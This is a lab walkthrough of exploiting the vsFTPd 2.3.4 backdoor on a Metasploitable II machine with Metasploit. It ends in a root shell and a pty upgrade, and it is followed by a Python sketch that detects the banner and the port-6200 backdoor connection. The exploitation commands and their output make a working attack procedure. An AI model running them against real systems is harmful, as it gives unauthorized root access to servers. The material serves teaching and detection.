In Metasploitable II, there is a vulnerable FTP installation on the remote host. Our goal is to exploit the vulnerability and gain local access to the remote machine.
sam@ubuntu:~/metasploit-framework$ ftp 192.168.56.101
Connected to 192.168.56.101.
220 (vsFTPd 2.3.4)
Name (192.168.56.101:sam): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
We see from the banner that the FTP daemon is vsFTPd version 2.3.4. Metasploit has a module for this version of the service.
Let's first fire up Metasploit and choose the module we will use to exploit the FTP service.
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic
Now all that's left to do is set the RHOSTS option and run the exploit against the remote host.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 - USER: 331 Please specify the password.
[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.56.1:35155 -> 192.168.56.101:6200) at 2020-02-07 06:18:49 -0700

id
uid=0(root) gid=0(root)
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@metasploitable:/#
As you can see, we got a root shell on the remote host.
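The session output above leaves two traces a defender can look for: the 2.3.4 banner and a connection to TCP port 6200 right after FTP traffic. The following detection sketch is an added example, not part of the original post or of Metasploit; the flow-record format, the 30-second window and all function names are assumptions, and the sample records are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample flow records: time, source, destination, destination port.
SAMPLE_FLOWS = """\
2020-02-07T06:18:47 192.168.56.1 192.168.56.101 21
2020-02-07T06:18:49 192.168.56.1 192.168.56.101 6200
2020-02-07T06:20:10 192.168.56.7 192.168.56.102 21
2020-02-07T09:00:00 192.168.56.9 192.168.56.103 6200
"""

SUSPECT_BANNER = re.compile(r"^220 \(vsFTPd 2\.3\.4\)")
FTP_PORT, SHELL_PORT = 21, 6200   # ports seen in the session output above
WINDOW = timedelta(seconds=30)    # assumed correlation window


def banner_is_suspect(banner):
    """True when the FTP greeting reports the version shown in the walkthrough."""
    return bool(SUSPECT_BANNER.match(banner.strip()))


def parse_flows(text):
    """Yield (timestamp, src, dst, dport) tuples from whitespace-separated lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed records
        ts, src, dst, dport = parts
        yield datetime.fromisoformat(ts), src, dst, int(dport)


def find_backdoor_sessions(flows):
    """Return (src, dst, time) for each port-6200 connection that closely follows FTP."""
    last_ftp = {}   # (src, dst) -> time of the most recent port-21 connection
    alerts = []
    for ts, src, dst, dport in sorted(flows):
        if dport == FTP_PORT:
            last_ftp[(src, dst)] = ts
        elif dport == SHELL_PORT:
            seen = last_ftp.get((src, dst))
            if seen is not None and ts - seen <= WINDOW:
                alerts.append((src, dst, ts))
    return alerts


if __name__ == "__main__":
    print(banner_is_suspect("220 (vsFTPd 2.3.4)"))
    for src, dst, ts in find_backdoor_sessions(parse_flows(SAMPLE_FLOWS)):
        print(f"ALERT {ts.isoformat()} {src} -> {dst}:{SHELL_PORT} after FTP")
```

A port-6200 connection with no preceding FTP contact from the same source, like the last sample record, is deliberately not flagged by the correlation; blocking inbound 6200 at the host firewall covers that case.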